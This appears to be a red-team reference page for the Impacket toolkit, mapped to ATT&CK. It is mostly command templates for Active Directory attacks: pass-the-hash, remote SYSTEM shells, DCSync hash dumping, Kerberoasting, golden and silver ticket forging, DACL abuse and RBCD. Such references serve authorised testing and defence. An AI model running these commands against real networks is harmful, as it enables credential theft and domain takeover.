Impacket

Overview

Impacket is a Python library and collection of tools for working with network protocols — SMB, MSRPC, Kerberos, LDAP, MSSQL, and more. It is the primary toolkit for AD attacks from Linux, covering remote execution, credential dumping, Kerberos abuse, and LDAP manipulation. On Kali: sudo apt install -y impacket-scripts.

ATT&CK Mapping

• Tactics: TA0002 - Execution, TA0006 - Credential Access, TA0008 - Lateral Movement
• Techniques: T1003.006 - DCSync, T1021.002 - SMB/Windows Admin Shares

Authentication Patterns

All Impacket tools share a common authentication syntax:

# Password
impacket-<tool> '<domain>/<user>:<password>@<target>'

# NTLM hash (pass-the-hash)
impacket-<tool> '<domain>/<user>@<target>' -hashes ':<ntlm_hash>'

# Kerberos ticket
export KRB5CCNAME=ticket.ccache
impacket-<tool> '<domain>/<user>@<target_hostname>' -k -no-pass

# AES key
impacket-<tool> '<domain>/<user>@<target>' -aesKey <aes256_key>

Tool Reference

Remote Execution

Tool	Protocol	Runs As	File Write	Detection
impacket-psexec	SMB	SYSTEM	Writes service binary	High
impacket-smbexec	SMB	SYSTEM	No binary, uses %COMSPEC%	Medium
impacket-wmiexec	WMI (DCOM)	User	No binary	Low
impacket-atexec	Task Scheduler	SYSTEM	No binary	Medium
impacket-dcomexec	DCOM	User	No binary	Low

# Impacket
# https://github.com/fortra/impacket

# Interactive shell via PsExec
impacket-psexec '<domain>/<user>:<password>@<target>'

# Semi-interactive shell via WMI
impacket-wmiexec '<domain>/<user>:<password>@<target>'

# Execute single command via task scheduler
impacket-atexec '<domain>/<user>:<password>@<target>' 'whoami'

# SMBExec (no binary upload)
impacket-smbexec '<domain>/<user>:<password>@<target>'

Credential Dumping

# Impacket
# https://github.com/fortra/impacket

# DCSync — dump all domain hashes
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc

# DCSync — specific user
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user 'krbtgt'

# Dump local SAM/LSA from remote host
impacket-secretsdump '<domain>/<admin>:<password>@<target>'

# Dump from local hive files
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

Kerberos

# Impacket
# https://github.com/fortra/impacket

# Kerberoasting
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request -outputfile kerberoast.txt

# AS-REP Roasting
impacket-GetNPUsers '<domain>/' -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep.txt

# Request TGT
impacket-getTGT '<domain>/<user>:<password>' -dc-ip <dc_ip>

# Request service ticket (S4U / delegation abuse)
impacket-getST '<domain>/<user>:<password>' -spn 'cifs/<target>' -impersonate Administrator -dc-ip <dc_ip>

# Forge Golden Ticket
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> Administrator

# Forge Silver Ticket
impacket-ticketer -nthash <svc_hash> -domain-sid <sid> -domain <domain> -spn 'cifs/<host>' Administrator

# Convert ticket format
impacket-ticketConverter ticket.kirbi ticket.ccache

Enumeration

# Impacket
# https://github.com/fortra/impacket

# SID lookup / RID brute force
impacket-lookupsid '<domain>/<user>:<password>@<dc_ip>'

# Enumerate AD users
impacket-GetADUsers '<domain>/<user>:<password>' -dc-ip <dc_ip> -all

# Find delegation relationships
impacket-findDelegation '<domain>/<user>:<password>' -dc-ip <dc_ip>

# LDAP shell (interactive LDAP)
impacket-ntlmrelayx --no-http-server -smb2support --escalate-user <user>

ACL Manipulation

# Impacket
# https://github.com/fortra/impacket

# Read DACL
impacket-dacledit '<domain>/<user>:<password>' -action read -target '<object>' -dc-ip <dc_ip>

# Grant DCSync rights
impacket-dacledit '<domain>/<user>:<password>' -action write -rights DCSync -principal '<user>' -target-dn 'DC=domain,DC=local' -dc-ip <dc_ip>

# Take ownership
impacket-owneredit '<domain>/<user>:<password>' -action write -new-owner '<user>' -target '<object>' -dc-ip <dc_ip>

Other Useful Tools

# Impacket
# https://github.com/fortra/impacket

# SMB client
impacket-smbclient '<domain>/<user>:<password>@<target>'

# MSSQL client
impacket-mssqlclient '<domain>/<user>:<password>@<target>' -windows-auth

# Add computer account (for RBCD)
impacket-addcomputer '<domain>/<user>:<password>' -computer-name 'FAKE01$' -computer-pass 'Password123'

# RBCD configuration
impacket-rbcd '<domain>/<user>:<password>' -delegate-to '<target>$' -delegate-from 'FAKE01$' -action write -dc-ip <dc_ip>

# Change password
impacket-changepasswd '<domain>/<user>@<dc_ip>' -newpass '<new_password>'

References

Official Documentation

• Impacket

MITRE ATT&CK

• T1003.006 - OS Credential Dumping: DCSync
• T1021.002 - Remote Services: SMB/Windows Admin Shares